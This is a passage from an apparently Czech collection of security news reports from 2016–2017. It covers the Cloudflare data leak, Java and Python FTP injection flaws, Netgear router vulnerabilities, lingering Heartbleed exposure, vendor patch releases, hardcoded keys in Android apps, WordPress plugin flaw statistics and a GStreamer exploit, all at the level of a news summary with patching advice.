Uniklá data se tak objevila v keších všemožných vyhledávačů a webových archivů. Společnost Cloudflare vyjednala s několika vyhledávači odstranění podobných dat, můžeme se však jen dohadovat, zda se všechna data najít povedlo a zda někde stále neleží. Je celkem pravděpodobné, že nějaké úniky budou k nalezení i v lokálních keších webových prohlížečů v počítačích a mobilech celého světa.

Uniklá data na prodej
Teprve po nasazení nové verze HTML parserů s opravenou zranitelností, ke kterému došlo večer v úterý 21. února, a odstranění všech nalezených úniků z výsledků vyhledávání, byla informace o zranitelnosti zveřejněna. Kromě již zmíněné post mortem analýzy na blogu Cloudflare byl také zpřístupněn tiket, ve kterém Tavis Ormandy dokumentoval postup opravy problému, včetně ukázek úniků. Společnost Cloudflare také rozseslala všem zákazníkům hromadný e-mail, ve kterém upozorňuje na to, že postižených bylo pouze přibližně 150 zákazníků, nicméně doporučuje zneplatnit a vyměnit všechna dlouhodobá tajemství, jakými jsou třeba cookie sezení.

Počet 150 zákazníků se zdá velmi podhodnocený, neboť jde pouze o počet unikátních doménových jmen, ve kterých byly nalezené uniklé informace prostřednictvím vyhledávačů. Není přitom zřejmé, zda se bezpečnostním expertům podařilo identifikovat, komu patřila vlastní uniklá data. Každý, kdo provozuje webserver za Cloudflare proxy, by tedy měl minimálně zrušit všechna uložená sezení. Ideálně pak také vyzvat uživatele k preventivní změně hesla. Ostatně, netrvalo dlouho a temný web začal nabízet k prodeji soubory uniklých dat. Těžko říct, zda jde o skutečný únik nebo o jednoduchý podvod, přiživující se na aktuální zprávě.

Zneplatněná přihlášení Google s problémem nesouvisí
Shodou okolností minulý týden Google zneplatnil uložená přihlášení velké části uživatelů. Vypadá to jako souvislost, ale nedává to úplně smysl, protože Google služby určitě Cloudflare nepoužívají a je tedy nepravděpodobné, že by cookies, které slouží k autentizaci vůči Google, byly v jakémkoli nebezpečí. Tavis Ormandy na přímý dotaz odpovídá, že incidenty nemají nic společného, na fóru Google je pouze zpráva, že v průběhu rutinní údržby došlo k odhlášení některých uživatelů. Nejspíš tedy opravdu jde o pouhou shodu okolností.

Maximální otevřeností k minimalizaci škod
Na celé události je zajímavý především způsob, jakým společnost Cloudflare o problému informovala. Přestože se jedná o komerční firmu, a chyba se objevila v proprietárním softwaru, který je součástí firemního know-how, množství informací zásadně překračuje obvyklé strohé sdělení typu: „V našich systémech se vyskytla chyba, už jsme ji opravili, změňte si prosím heslo.“

Překvapující je také rychlost, s jakou byla společnost schopna úniky dat zastavit (i za cenu omezení služeb) i jak rychle byla nainstalována oprava. Škoda jen, že zpráva nejspíše podceňuje počet obětí. V haldě podrobných technických informací se také ztrácí krátká a jednoduchá informace pro zákazníky, co mají se svou službou za Cloudflare dělat, aby vliv případných úniků minimalizovali.

Java má další kritickou zranitelnost, zneužít jde integrovaný FTP klient

23.2.2017 SecurityWorld Zranitelnosti
Prostředí Javy a Pythonu nesprávně potvrzují platnost FTP odkazů, což může útočníkům případně usnadnit prolomení některých částí firewallu a přístup do lokální sítě.

Bezpečnostní výzkumník Alexander Klink odhalil zajímavý útok, kde zneužití XXE (XML External Entity útok) zranitelnosti v aplikace napsané v Javě umožňuje rozesílání e-mailů.

XXE zranitelnosti mohou být zneužity přelstěním aplikací, které provedou syntaktickou analýzu (parsování) specificky vytvořených XML souborů. Tyto soubory donutí XML parser odhalit citlivé informace jako jsou soubory, informace o adresář nebo i o procesech, které na serveru běží.

Klink popsal, že stejný typ zranitelností umí zmást běhové prostředí Javy tak, aby započalo FTP spojení se vzdálenými servery tím, že mu zašle FPT URL ve formátu ftp://user:password@host:port/file.ext.

Ukázalo se že, že vestavěná implementace FTP klienta v Javě nefiltruje speciální CR a LF znaky z odkazů a překládá je.

Vložením takových znaků do části pro uživatelské jméno nebo heslo v URL FTP může být FTP klient Javy zmaten natolik, aby začal vykonávat škodlivé příkazy, a dokonce se může tvářit a částečně fungovat jako SMTP (e-mailový protokol), protože syntaxe FTP a SMTP jsou si podobné.

Exploatací XXE zranitelnosti Klink ukázal, jak snadno může útočník přinutit aplikaci Javy odeslat e-mail na SMTP server.

„Tento útok je obzvláště zajímavý v situaci, kdy můžete poslat mail do interního (často nezabezpečeného, třeba i bez spam nebo malware filtru) e-mailového serveru ze stroje, který se zabývá XML parsingem,“ vysvětluje Klink v příspěvku na blogu.

Poté, co se o zranitelnosti objevené Klinkem dozvěděl Timothy Morgan, výzkumník u Blindspot Security, rozhodl se zveřejnit své znalosti o podobném útoku, který funguje v implementaci FTP v Javě i Pythonu. Tento útok je však mnohem vážnější, neboť dokáže prolomit firewall.

Morgan útoku říká „stream injection FTP prokolu skrze škodlivé URL“ a rovněž zahrnuje vložení škodlivých příkazu do FTP kvůli absenci CR a LF filtrování. Místo vkládání SMTP příkadů však Morgan zneužívá FTP port příkaz k přelstění klienta, aby otevřel datový kanál ke vzdálenému FTP serveru na specifickém TCP portu.

Jak výzkumník poukazuje, mnoho na Linuxu založených SPI firewallů, včetně komerčních, podporuje klasický model FTP interpretace a automaticky TCP port otevře a přepošle jej na LAN IP FTP klienta, pokud detekuje port příkaz v FTP trafficu z onoho klienta.

Podobný vzorec útoku je známi již poměrně mnoho let, proto vývojáři conntracku, Linuxové sady nástroje, které většina firewallů používá, přidaly dodatečnou ochranu; port se otevře pouze pokud se příkaz port objeví na úplném začátku TCP paketu, což zajišťuje, že klient skutečně příkaz poslal.

To pro útočníka představuje dvojí problém: prvně musí odhalit interní IP adresu klienta, aby byl schopen zfalšovat příkaz port a následně ještě sjednotit TCP packety mezi klientem serverem tak, aby se zfalšovaný příkaz ocitl na začátku packetu.

Morgan dokáže oba tyto kroky učinit pomocí svého stream injection útoků a zároveň tvrdí, že osobně vytvořil vlastní exploit, který však nehodlá jakožto etický hacker zveřejnit, dokud Oracle a Python neopraví kód svých integrovaných FTP klientů.

„Celý útok (včetně requestu, pomocí které se zjistí interní IP adresa oběti) lze typicky učinit pomocí pouhých tří SSRF útoků, které jeden TCP port otevřou,“ napsal Morgan v příspěvku na blogu. „Každý další SSRF útok může otevřít další TCP port.“

Zranitelnost lze zneužít mnoha způsoby, včetně využití proti uživatelům s Javou na počítači. Uživatelé ani nemusí spustit škodlivou Java aplikaci, protože exploit lze využít i přes Java Web Start.

„Pokud by uživatel navštívil webovou stránku se škodlivým kódem a měl nainstalovanou Javu, tak i s vypnutými Java applety by mohl spustit Java Web Start, který parsuje soubor JNLP,“ popisuje Morgan. „Tyto soubory by mohly obsahovat škodlivé FTP URL, které chybu spouští.“

Morgan prý útok otestoval proti vlastnímu Linuxovému firewallu běžícím na nedávném jádře a také proti Palo Alto Networks a Cisco Systems firewallům. Ty prokázaly zranitelnost vůči exploitu.

„Ačkoli testování komerčních firewallů bylo do této doby velmi omezené, zdá se pravděpodobné, že značná část firewallů na světě je vůči stream injection FTP protokolu zranitelná,“ popisuje.

Vývojáři Javy a Pythonu byli o problému informování, dokud však neopraví implementace FTP klientů, výzkumník doporučuje prodejcům firewallu dočasně v základu blokovat klasický FTP překlad.

Uživatelé by si měli ze systému odinstalovat Javu, nebo alespoň zablokovat plug-in v prohlížeči a zrušit asociaci Javy s .jnlp koncovkou. XML parsing v Javě je momentálně notně zranitelný, XXE zranitelnost jsou tak na platformě velmi běžné, dodává Morgan.

Routery od Netgearu obsahují kritickou bezpečnostní trhlinu. Opět

2.2.2017 Novinky/Bezpečnost Zranitelnosti
Na pozoru by se měli mít majitelé routerů od společnosti Netgear. Tyto brány do světa internetu totiž obsahují kritickou bezpečnostní trhlinu, kterou mohou počítačoví piráti zneužít ke vzdáleným útokům. Stejnému riziku přitom byli uživatelé vystaveni už na konci loňského roku.
Před chybou týkající se zabezpečení routerů varoval český Národní bezpečnostní tým CSIRT, který je provozován sdružením CZ.NIC. „Mnohé modely routerů společnosti Netgear obsahují zranitelnosti, které lze zneužít v případě, že je povolen vzdálený management routeru,“ varoval bezpečnostní analytik Pavel Bašta z týmu CSIRT.

„Pokud je tato funkcionalita povolena, mohou útočníci získat heslo do zařízení pomocí webového dotazu sloužícího obvykle pro obnovu hesla. Vzdálený management není ve výchozím nastavení povolen,“ konstatoval Bašta.

Závažná chyba se objevila již loni
Stejně závažnou chybu měly routery od společnosti už na konci loňského roku. [celá zpráva]

Útok tehdy také začínal ve chvíli, kdy uživatel navštívil podvodnou webovou stránku. Prostřednictvím ní se dostane do routeru záškodník, s jehož pomocí může kyberzločinec například řídit síťový provoz.

Že je router zavirovaný, mohou uživatelé poznat například podle toho, že jim přestane z připojených počítačů zcela fungovat internetové připojení, případně se při snaze o připojení na nějakou webovou stránku zobrazí úplně jiný web.

Přesně to se stalo už v minulosti kvůli zranitelnosti známé jako „rom-0“. Místo serverů, jako jsou například Seznam.cz nebo Google.com, se poškozeným zobrazila hláška o nutnosti instalace flash playeru. Místo té se ale do PC stáhnul další virus. Útočníci tak rázem měli přístup nejen k routeru, ale i k připojenému počítači.

Oprava je již k dispozici
„Společnost Netgear již vydala aktualizaci firmwaru pro některé z dotčených modelů,“ podotkl bezpečnostní analytik. Právě zmiňovaná oprava zavře počítačovým pirátům zadní vrátka do routeru.

S instalací aktualizace by tak lidé neměli rozhodně otálet.

Routery Netgear mají závažnou chybu. Pokud takový máte, aktualizujte si firmware
1.2.2017 Živě.cz Zranitelnosti

Routery Netgear obsahují závažnou bezpečnostní chybu, která umožní získat přístup ke správě zařízení. Chyba není až tak vážná, jako prosincový případ, protože se vyskytuje jen v případě, že na routeru máte povolen vzdálený management. Ten ve výchozím stavu není povolen, a proto se ohrožení dotkne jen menší části uživatelů, upozornil CSIRT.
Do Česka dorazila další vlna útoků na domácí routery. Obrana je přitom triviální
Netgear rychle zareagoval a vydal pro svá zařízení aktualizace firmwaru. Přestože přímý dopad nově objevené zranitelnosti není velký, je vhodné, aby si firmware aktualizoval každý. Nikdy nevíte, kdy se vám vzdálený management bude hodit a při jeho povolení už si na chybu nevzpomenete.

Chyba spočívá v možnosti získat heslo k administraci routeru pomocí webového skriptu. Poté už útočník získá kontrolu nad routerem a může ho zneužít.
Pětice extrémních routerů, které jsou dražší než obyčejný počítač
Chyba se týká konkrétně těchto modelů:

R8500
R8300
R7000
R6400
R7300DST
R7100LG
R6300v2
WNDR3400v3
WNR3500Lv2
R6250
R6700
R6900
R8000
R7900
WNDR4500v2
R6200v2
WNDR3400v2
D6220
D6400
C6300

Heartbleed po třech letech ohrožuje stále zhruba 200 000 zařízení
25.1.2017 Root.cz Zranitelnosti
Jsou to téměř tři roky, co byla objevena a popsána vážná bezpečnostní chyba v OpenSSL, známá pod jménem Heartbleed. Po třech letech je stále na internetu přibližně 200 000 zařízení umožňující chybu zneužít.
Chyba s názvem Heartbleed (CVE-2014–0160) byla veřejnosti odhalena 7. dubna 2014. Jednalo se o chybu v knihovně OpenSSL od verze 1.0.1 až do verze 1.0.1f včetně. Chybná verze knihovny dovolovala vyčíst data z paměti aplikace. V té se může nacházet spousta citlivých informací včetně přihlašovacích údajů nebo třeba privátních klíčů. Podrobně jsme celý problém rozebrali v článku Heartbleed bug: vážná zranitelnost v OpenSSL.

Oprava byla vydána zároveň s oznámením a mnoho významných vývojářů bylo varováno předem. Některé firmy proto záplatovaly ještě o několik dní dříve než se o problému dozvěděla média a veřejnost. Většina velkých webů byla už dva dny po zveřejnění záplatována, některé své uživatele vyzvaly ke změně hesla.

Po více než měsíci bylo napadnutelných jen něco přes 12 tisíc stránek z žebříčku Alexa, ve kterém figuruje 800 000 nejnavštěvovanějších webů. To je asi 1,5 % webů z této statistiky. Přesto je zřejmé, že tyto weby sice tvoří většinu návštěvnosti, ale jde jen o zlomek z celkového počtu webových serverů vystavených do internetu.

Po třech letech
Jsou to přibližně tři roky a je tu nová statistika: stále je napadnutelných přibližně 200 000 zařízení. Informace vychází z měření služby Shodan, která skenuje internet a dokáže podat informaci o otevřených portech a použitých službách. Takto je možné zjistit, jaká verze knihovny OpenSSL na daném serveru běží.

Počet zranitelných serverů už přitom dlouho klesá jen velmi pomalu. Podobné měření totiž proběhlo už v květnu 2014, kdy bylo naměřeno přes 318 000 děravých instalací. Poté bylo v listopadu 2015 Shodanem změřeno 238 000 zranitelných serverů, v březnu 2016 pak číslo mírně kleslo na 237 539. Nyní ukazuje 199 594. V Česku máme 1284 serverů s nezáplatovaným OpenSSL.

John Matherly, šéf projektu Shodan, tvrdí, že mezi hříšníky figurují i takové firmy jako Amazon, Verizon Wireless, německý poskytovatel připojení Strato, OVH, 1&1 Internet a americký telekomunikační gigant Comcast. Poznámka: SK Broadband je jihokorejský poskytovatel připojení.

Mezi nejčastěji nezabezpečené služby patří web server Apache (hlavně verze 2.2.22 a 2.2.15), přičemž nejčastěji je využíván Linux s jádrem 3.x, následovaný verzí 2.6.x a Windows 7 a 8. Ohroženy jsou ale řady dalších aplikací, jako je web server Nginx, konfigurační rozhraní firewallů FortiGate, DD-WRT nebo služba Kerio Connect.

Dá se očekávat, že jde o služby, o které se nikdo pořádně nestará a neudržuje je záplatované. Ukazuje to i fakt, že velká část certifikátů na těchto službách již expirovala. Pokud správci nevadí ani tento fakt, pravděpodobně mu nevadí ani děravé OpenSSL nebo na server jednoduše zapomněl.

Bylo dokázáno, že chyba je zneužitelná a posloužila pravděpodobně k ukradení lékařských záznamů 4,5 milionů pacientů. Pokud provozujete nějaké služby vystavené do internetu, podívejte se, jestli tam nestraší tři roky stará knihovna, která byla dávno záplatována.

Apple vydává balík oprav, chyby mají všechny operační systémy

24.1.2017 Novinky/Bezpečnost Zranitelnosti
Velký balík aktualizací vydala tento týden společnost Apple. Chyby obsahují prakticky všechny její operační systémy, tedy verze pro klasické počítače, chytré telefony, tablety, ale například i nositelnou elektroniku. Trhliny obsahuje také webový prohlížeč Safari, upozornil Národní bezpečnostní tým CSIRT.CZ.
„Dotčený je operační systém macOS, mobilní operační systém iOS, systém pohánějící chytré hodinky Apple Watch - watchOS, ale také internetový prohlížeč Safari a multimediální aplikace iTunes,“ podotkl Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Jak je z řádků výše patrné, chyb byla opravena celá řada. S instalací aktualizací se přitom nevyplácí otálet, neboť některé trhliny se týkají také bezpečnosti. Jedna z vydaných oprav řeší chybu v iOS, při jejím zneužití je možné iPhone odemknout i pomocí neautorizovaných Apple Watch, nastínil Bašta.

Převezmou kontrolu nad zařízením
„Některé zranitelnosti byly označeny jako kritické a jejich zneužití by mohlo umožnit útočníkovi převzetí kontroly nad zařízením,“ varoval bezpečnostní analytik.

Jinými slovy tedy mohou prostřednictvím některých trhlin kyberzločinci propašovat do zařízení s logem nakousnutého jablka prakticky jakýkoli škodlivý kód. Z napadeného stroje také mohou odcizit prakticky libovolná data.

Sluší se podotknout, že v bezpečí nejsou ani uživatelé Windows, kteří používají softwarové řešení od Applu. Tedy pokud mají nainstalovanou multimediální aplikaci iTunes či webový prohlížeč Safari. Ani v těchto případech se nemusí vyplatit otálení s instalací aktualizace.

Stahovat updaty je možné prostřednictvím automatických aktualizací v samotných operačních systémech nebo dotčených aplikacích, či prostřednictvím webových stránek společnosti Apple.

Chyby mají Office, Edge i Java
Chybám v tomto měsíci neunikly ani aplikace od společnosti Microsoft. Kritické bezpečnostní trhliny byly objeveny v internetovém prohlížeči Edge a kancelářském balíku Office. Stahovat aktualizace je nicméně také možné. [celá zpráva]

Naprostým rekordmanem v počtu nalezených trhlin je však společnost Oracle, která nabízí desítky nejrůznějších softwarových nástrojů a utilit pro korporátní klientelu, ale také programy pro běžné uživatele – například Javu. V aplikacích tohoto podniku bylo v lednu nalezeno 270 trhlin.

Bezpečnostních chyb jako máku. Oracle opravuje najednou 270 trhlin

22.1.2017 Novinky/Bezpečnost Zranitelnosti
Bez nadsázky obří balík záplat vydala společnost Oracle, obsahuje totiž opravy pro bezmála tři stovky chyb. Aktualizace se týká prakticky celého softwarového portfolia této společnosti. Nemalé množství trhlin bylo přitom označováno jako velmi kritické.
Oracle nabízí desítky nejrůznějších softwarových nástrojů a utilit. Běžní uživatelé se ale s nimi přímo setkají jen málokdy, zpravidla jde totiž o řešení určená pro nasazení v menších či větších firmách. Jde o různé databázové a vývojářské nástroje, stejně jako o nástroje určené k řízení podniků.

Právě proto je ale celá hrozba napadení ještě závažnější. Ve firmách totiž mohou napáchat počítačoví piráti daleko více škody než v domácnostech.

U více než stovky chyb je přitom možné vzdálené zneužití. To jinými slovy znamená, že je počítačoví piráti mohou zneužít k tomu, aby do konkrétních počítačů nebo podnikové sítě propašovali prakticky libovolný škodlivý kód. Stejně tak ale mohou přistupovat k nastavení napadeného stroje či uloženým datům na discích.

Problémy mohou mít i běžní uživatelé
Některé chyby se ale týkají i přímo běžných uživatelů. V portfoliu společnosti Oracle je totiž například Java, která je často využívána pro korektní chod některých webových stránek. V počítači ji tak mají nainstalovanou desítky miliónů lidí po celém světě.

A právě u zmiňované Javy bylo odhaleno 17 chyb, z toho 16 mohou vzdáleně zneužít kyberzločinci ke vzdáleným útokům. Kritické chyby obsahuje například také Virtual Box, který se mezi zběhlejšími uživateli těší poměrně velké popularitě.

Jak je z řádků výše patrné, obezřetnost je tedy na místě. Stahovat opravy je možné prostřednictvím automatických aktualizací v jednotlivých programech, případně prostřednictvím webových stránek společnosti Oracle.

Zadní vrátka pro utajený přístup obsahují tisíce aplikací pro Android

18.1.2017 SecurityWorld.cz Zranitelnosti
Zneužít se mohou data ve službách jako Amazon Web Services, Slack, Dropbox nebo Twitter, ale také mnoha dalších.

API klíče AWS nebo přístupové tokeny na Twitter – co vše lze najít v aplikacích Androidu. Studie bezpečnostní firmy Fallible prozkoumala 16 000 aplikací na Androidu – a zjistila, že 2 500 z nich má v sobě některý druh tajné přístupové informace napevno zakódovaný.

Mnoho vývojářů aplikací pro Android stále ukládá přístupové tokeny a API klíče přímo do aplikace, čímž vystavují data uložená ve službách třetích stran bezpečnostnímu riziku.

Zahrnutí přístupových klíčů třetích stran přímo do aplikace je ospravedlnitelné ve chvíli, kdy je rozsah pravomocí a služeb tokenů omezený. V některých případech však vývojáři do aplikace zakódovali i API klíče, které přistupují k velmi citlivým datům nebo zneužitelným systémům.

To byl případ celkem 304 služeb, které obsahovaly přístupové tokeny a API klíče do služeb jako Twitter, Dropbox, Flickr, Instagram, Slack nebo AWS.

Tři sta aplikací z 16 000 se může zdát jako zanedbatelný počet, ale v závislosti na druhu a pravomocích daného tokenu či klíče může jediná uniknutá bezpečnostní informace znamenat obrovský bezpečnostní problém.

Tak například tokeny ke Slacku mohou poskytnout přístup k historii chatu využívaného vývojářským týmem, a ty mohou obsahovat dodatečné přístupové informace např. k databázím, integračním platformám a dalším vnitrofiremním službám, ani nemluvě o sdílených souborech a dokumentech.

Již minulý rok odhalili výzkumníci z bezpečnostní společnosti Detectify přes 1 500 tokenů ke Slacku, napevno zakódovaných do původních projektů na GitHubu. Na GitHubu se v minulosti objevily rovněž klíče k AWS, a to řádově v tisících. Amazon tak musel začít aktivně vyhledávat podobné úniky a uveřejněné klíče blokovat.

Některé z AWS klíčů v analyzovaných aplikacích na Androidu mělo plné pravomoce, mohly tedy vytvářet a mazat instance, popisují pracovníci Fallible v příspěvku na blogu. Mazání jednotlivých instancí AWS může vést ke ztrátě dat a vyššímu downtimu, jejich vytváření zase umožňuje útočníkům využívat výpočetní sílu na úkor zákazníka.

Nejde zdaleka o první případ, kdy se různé přístupové údaje objevují napevno zakódovány v mobilních aplikacích. V roce 2015 odhalila skupina výzkumníků z Technické univerzity v Darmstadtu v Německu přes 1 000 přístupových klíčů pro BaaS aplikační rámce uložené v aplikacích Androidu a iOS.

Tato data umožňovala přístup k 18,5 milionům záznamů, obsahujícím 56 milionů dat, která vývojáři k BaaS poskytovatelům (např. Parse, CloudMine nebo AWS) uložili.

Nedávno spatřil světlo světa open source nástroj Truffle Hog, který pomáhá podnikům i jednotlivcům s prohledáním svých aplikací, zda vývojáři neopomněli odstranit některé tokeny, které dovnitř vložili během vývoje a následně zapomněli odstranit.

Kritické chyby mají Flash Player, Acrobat i Reader. Mohou je zneužít kyberzločinci

17.1.2017 SecurityWorld Zranitelnosti
Hned několik bezpečnostních trhlin bylo odhaleno v oblíbeném programu Flash Player. Ten slouží k přehrávání videí na internetu a po celém světě jej používají stovky miliónů lidí. Chyby se nevyhnuly ani programům Acrobat a Reader, které slouží k práci s PDF dokumenty. Záplaty od společnosti je však již možné stahovat.
„Vydaná aktualizace pro Acrobat a Reader verzí 11 a 15 opravuje celkově 29 kritických zranitelností, z nichž některé by při zneužití mohly útočníkovi umožnit převzetí kontroly nad systémem,“ Pavel Bašta, bezpečnostní analytik Národního bezpečnostního týmu CSIRT.CZ, který je provozován sdružením CZ.NIC.

Obezřetní by měli být uživatelé také v případě Flash Playeru. „V případě tohoto programu bylo opraveno 13 kritických bezpečnostních chyb v dřívějších verzích, které mohly vést ke spuštění škodlivého kódu nebo úniku citlivých dat,“ konstatoval Bašta.

Propašují virus, zotročí počítač
Prostřednictvím chyb mohli kyberzločinci propašovat na cizí počítač prakticky jakýkoli škodlivý kód, případně jej zcela ovládnout na dálku. Mohli se tak snadno dostat k uloženým datům, případně odchytávat přihlašovací údaje na různé webové služby.

Častý terč útoků
Stahovat záplatu je možné prostřednictvím automatických aktualizací daného programu nebo prostřednictvím stránek společnosti Adobe.

Kvůli chybě v nových procesorech od Intelu lze přes USB port bez povšimnutí ovládnout jakýkoli systém
11.1.2017 Živě.cz Zranitelnosti

Bezpečnostní rizika dnes hrozí ze všech možných stran a nevyhýbá se tomu ani samotný hardware. Tentokrát inženýři Maxim Goryachy a Mark Ermolov ze společnosti Positive Technologies objevili velmi závažnou chybu v moderních procesorech od Intelu.

Nebezpečný USB „flash disk“, který zničí váš počítač
Všechny procesory standardně umožňují nějakou možnost hardwarového přístupu pro ladění a konfiguraci, která probíhá při výrobě. Ale zatímco dříve byly nutné specializované nástroje, u procesorů s architekturou Intel Skylake a novějších už je možné k JTAG přistupovat i přes rozhraní USB 3.0 v rámci DCI (Direct Connect Interface).

Kvůli tomu lze zaútočit na daný systém, aniž by to bylo možné detekovat, protože útok probíhá na pod úrovní softwaru. Tímto způsobem by tak případný hacker mohl změnit bios a nastavení, dostat se k informacím, vkládat vlastní kód (malware) a podobně. Žádná ochrana v rámci systému tak nepomůže.

Podle vyjádření nezáleží, jaký systém na daném notebooku, počítači nebo serveru běží. Zatím se tato chyba objevila pouze u úsporných procesorů řady U. Intel už o zranitelnosti ví, ale zatím se k problému oficiálně nevyjádřil.

Více než 8 800 pluginů pro WordPress ze 44 705 je děravých
19.12.2016 Root.cz Zranitelnosti
Společnost RIPS Technologies prověřila bezpečnost pluginů pro známý blogovací systém WordPress. Výsledek není dobrý: každý pátý plugin obsahuje bezpečnostní mezeru.

Bezpečnostní odborníci ze společnosti RIPS Technologies publikovali podrobnou studii, ve které se zabývali bezpečností pluginů pro populární blogovací nástroj WordPress. Stáhli jsme všech 47 959 pluginů a podrobili jsme je analýze našimi nástroji. Překvapivě každý druhý velký plugin obsahuje středně nebezpečnou chybu, píše se v analýze.

Byly testovány jen takové pluginy, které obsahují alespoň jeden soubor s kódem v PHP. Těch je celkem 44 705. Průměrně obsahují rozšíření 8,43 souborů a v každém z nich je průměrně 602 řádek. Většina pluginů je přitom velmi malých, více než 14 000 z nich (32 %) obsahuje jen mezi dvěma a pěti soubory.

Počet souborů a řádků v pluginech
Existuje celkem 10 523 větších pluginů, tedy takových, které mají více než 500 řádek kódu. Z nich má 4 559 (43 %) alespoň jednu středně závažnou bezpečnostní chybu, jako například cross-site scripting. Důležité ale je, jak je závažnost chyb rozprostřena mezi pluginy. Celkem bylo objeveno 8878 děravých rozšíření.

Závažnost bezpečnostních chyb
Celkem bylo objeveno 67 486 problémů bezpečnostního charakteru a z výše uvedeného grafu plyne, že ve většině pluginů nebyl objeven žádný. A obráceně: v poměrně malé skupině pluginů bylo objeveno hodně chyb. Domníváme se, že je to proto, že většina pluginů je velmi malých. Je těžší udělat chybu ve stořádkovém kódu než v 5000 řádcích, říká analýza.

Následující graf ukazuje korelaci mezi velikostí pluginu a počtem chyb. Modré tečky ukazují, že většina pluginů má méně než 1000 řádek a většina z nich neobsahuje žádnou chybu. Jakmile ale začne počet řádků růst, začne chyb výrazně přibývat. To podporuje naši teorii, že většina pluginů neobsahuje chyby, protože jsou příliš malé.

Řádky kódu a chyby
Jaký druh chyb se objevuje nejčastěji? Asi není překvapením, že v 68,4% jde o cross-site scripting, ke kterému dochází, když stránka ukáže uživatelsky vložený výstup bez ošetření HTML vstupu. Tato chyba se objevuje nejčastěji, protože výstup dat je nejčastější operací v PHP, tudíž je zatížena bezpečnostními problémy častěji než jiné. Tyto chyby jsou navíc velmi závažné, protože umožňují například injektovat PHP kód skrz editor šablon. Naštěstí vyžadují interakci se správcem.

Druhým nejčastějším problémem, který zasahuje 20,7 % děravých pluginů, je SQL injection. Jsou výrazně nebezpečnější než cross-site scripting, protože v nejhorším případě umožňují vyčtení citlivých informací z databáze – například hesel. Velmi často jsou proto zneužívány k automatizovaným útokům.

Název chyby Četnost
Cross-Site Scripting 38778
SQL Injection 11746
Resource Injection 1747
Path Traversal 778
File Upload 590
File Delete 441
Session Fixation 414
File Create 399
Weak Cryptography 348
File Write 300
PHP Object Injection 251
Open Redirect 227
Connection String Injection 177
CVE 109
File Inclusion 108
PHP Object Instantiation 101
Command Execution 78
XML/XXE Injection 65
Code Execution 61
XPath Injection 9
LDAP Injection 6
Zajímavá je také statistika o nejčastěji napadaných pluginech. Analytici kvůli ní provozují honeypot, na kterém sledují, kam míří které útoky. Během letošního roku bylo takto zaznamenáno více než 200 útoků a nejčastějšími cíli jsou následující pluginy:

Revolution Slider: 69 útoků
Beauty & Clean Theme: 46 útoků
MiwoFTP: 41 útoků
Simple Backup: 33 útoků
Gravity Forms: 11 útoků
Wordpress Marketplace: 9 útoků
CP Image Store: 8 útoků
Wordpress Download Manager: 6 útoků
Všechny útoky byly provedeny pomocí chyb, které jsou známé a zdokumentované. Většinu z nich je velmi snadné zneužít a umožňují spuštění libovolného kódu. To je činí zajímavými pro vytváření PHP botnetů, píše se v analýze.

Ekosystém okolo WordPressu je veliký a komunitou vytvářené pluginy obsahují často chyby. Analýza ukazuje, že většina je jich v poměrně malé skupině pluginů, ovšem s rostoucí velikostí roste taky šance na chybu. Bylo by tedy zajímavé korelovat chybovost a nebezpečnost s popularitou jednotlivých pluginů.

Zero day zranitelnost Linuxu způsobená emulátorem SNES
19.12.2016 Root.cz Zranitelnosti
Bezpečnostní odborník Chris Evans zveřejnil novou zero day zranitelnost, která ohrožuje linuxové distribuce. Překvapivě za problémem stojí emulátor SNES, který je integrován do systémových knihoven.
S kuriózní chybou přišel Chris Evans, který zároveň předvedl velmi spolehlivý exploit. K jeho spuštění stačí, aby uživatel navštívil upravenou webovou stránku, na které je umístěn zvukový soubor s příponou .flac nebo .mp3. Ve skutečnosti jde ale o audio soubor ve formátu SPC – hudební soubor z herní platformy Nintendo SNES.

Chyba byla předvedena na distribucích Fedora 25 a Ubuntu 16.04 LTS, ale pravděpodobně bude funkční i na dalších distribucích. Evans předvedl, jak pomocí upraveného hudebního souboru stáhne a spustí libovolný kód, který pak poběží s právy uživatele, který se soubor pokusil přehrát.

Názorně je to vidět na dvou krátkých videích, kde je demonstrováno prosté spuštění kalkulačky.
Na exploitu je zajímavé to, že využívá chybu v knihovně GStreamer. Ta dovoluje mimo jiné přehrávat zvukové soubory z herní konzole SNES a dělá to pomocí emulace zvukového procesoru Sony SPC700 založeného na MOS 6502.

Konkrétně je problém v knihovně Game_Music_Emu, která takto dovoluje emulovat různý starý hardware právě pro potřeby přehrávání zvukových souborů. Právě v emulaci SPC se ale nacházejí dvě vážné chyby, které je možné zneužít a uniknout z emulátoru ven. Evans vše velmi podrobně rozepsal na svém blogu.

Pro zneužití chyby je potřeba hudební soubor otevřít tak, aby k jeho zpracování byl použit právě GStreamer. Ten je ale automaticky volán například ve správci souborů Nautilus, video přehrávači Totem nebo prohlížeči Chrome (ten je použit v ukázce).

Autor: Wikimedie, CC BY-SA 3.0
Tak to je on, zvukový čip v SNES
Podstatné je, že takto zneužitá chyba může například uživateli odcizit veškerá data, nainstalovat libovolný malware nebo jinak libovolně zneužít přístupu do systému. Sám Evans uvádí, že chybějící sandboxing (oddělení aplikací) výrazně přispívá ke zneužitelnosti chyby. Žijeme ve světě, kde by sandboxy pro parsování médií měly být povinné, píše na svém blogu a dodává, že je tu jistá naděje na změnu, protože jeho dřívější odhalení už přiměla vývojáře vytvořit sandbox pro Gnome Tracker.

Zároveň vysvětluje, že dopad exploitu závisí na konkrétní distribuci. V Ubuntu je například příslušná knihovna gstreamer1-plugins-bad nainstalována už v základu, pokud uživatel při instalaci vybral podporu formátu mp3. Autoři Fedory se GStreamer rozhodli rozdělit do několika různých balíků a ve výchozí instalaci knihovna Game Music Emu chybí. Fedora ale ochotně nabídne její instalaci, pokud se uživatel pokusí otevřít relevantní zvukový formát.

Christ Evans nedávno zveřejnil podobný problém týkající se emulace NES, kdy byl schopen obejít 64bitový ASLR pomocí přehrávání zvukových souborů NSF. Problém se ale týkal staré verze knihovny GStreamer 0.10.x, takže exploit fungoval jen na velmi starých distribucích. Bylo potřeba mít přesně verzi Ubuntu 12.04.5.

Routery Netgear obsahují kritickou chybu. Stáhněte si aktualizaci firmwaru
15.12.2016 Živě.cz Zranitelnosti

Majitelé routerů značky Netgear by měli zbystřit. Několik populárních modelů je totiž náchylných na kritickou zranitelnost. Využití chyby je tak jednoduché, že odborníci z organizace CERT doporučili nepoužívat dotyčná zařízení. Informace o hrozbě zveřejnila CERT na svých internetových stránkách. Netgear však rychle zareagoval a již uvolnil betaverze opravných firmwarů.
Do Česka dorazila další vlna útoků na domácí routery. Obrana je přitom triviální
